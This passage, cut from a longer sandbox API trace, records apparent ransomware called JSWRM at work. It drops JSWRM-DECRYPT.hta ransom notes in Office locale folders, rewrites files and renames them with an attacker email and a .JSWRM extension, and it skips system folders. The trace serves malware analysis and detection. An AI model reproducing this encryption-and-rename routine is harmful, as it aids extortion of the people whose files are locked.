cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-cn\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.964] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.964] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.965] CloseHandle (hObject=0x238) returned 1 [0136.965] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-cn\\jswrm-decrypt.hta")) returned 0x20 [0136.965] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x484c5f1e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0136.965] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.965] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x484c5f1e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.965] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.965] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.965] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x484c5f1e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x484c5f1e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x484c5f1e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.965] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.965] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.965] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.965] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.965] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.965] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.966] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.966] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.966] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-cn\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.967] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14488) returned 1 [0136.967] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.967] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3890, lpOverlapped=0x0) returned 1 [0136.970] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.970] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3890, lpOverlapped=0x0) returned 1 [0136.970] CloseHandle (hObject=0x314) returned 1 [0136.970] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-cn\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-CN\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-cn\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.971] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc40a725, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc40a725, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc40a725, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.971] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0136.971] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2=".") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="..") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="...") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="windows") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="recovery") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="perflogs") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="documents and settings") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="$RECYCLE.BIN") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="system volume information") returned 1 [0136.971] lstrcmpiW (lpString1="zh-TW", lpString2="msocache") returned 1 [0136.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-tw\\jswrm-decrypt.hta")) returned 0xffffffff [0136.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-tw\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.973] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.973] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.974] CloseHandle (hObject=0x238) returned 1 [0136.974] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-tw\\jswrm-decrypt.hta")) returned 0x20 [0136.974] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x484ebf17, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName=".", cAlternateFileName="")) returned 0x232040 [0136.974] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.974] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x484ebf17, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="..", cAlternateFileName="")) returned 1 [0136.975] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.975] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.975] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x484ebf17, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x484ebf17, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x484ebf17, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.975] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.975] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.975] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-tw\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.976] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14488) returned 1 [0136.976] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.977] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3890, lpOverlapped=0x0) returned 1 [0136.979] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.979] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3890, lpOverlapped=0x0) returned 1 [0136.979] CloseHandle (hObject=0x314) returned 1 [0136.979] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-tw\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\zh-TW\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\zh-tw\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.980] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3898, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.980] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0136.980] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x659fb9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x659fb9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x659fb9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0136.980] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0136.981] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddaac59, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddaac59, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b382177, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3392, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSO0127.ACL", cAlternateFileName="")) returned 1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2=".") returned 1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="..") returned 1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="...") returned 1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="windows") returned -1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="recovery") returned -1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="perflogs") returned -1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="documents and settings") returned 1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="$RECYCLE.BIN") returned 1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="system volume information") returned -1 [0136.981] lstrcmpiW (lpString1="MSO0127.ACL", lpString2="msocache") returned -1 [0136.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO0127.ACL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.981] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO0127.ACL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO0127.ACL", 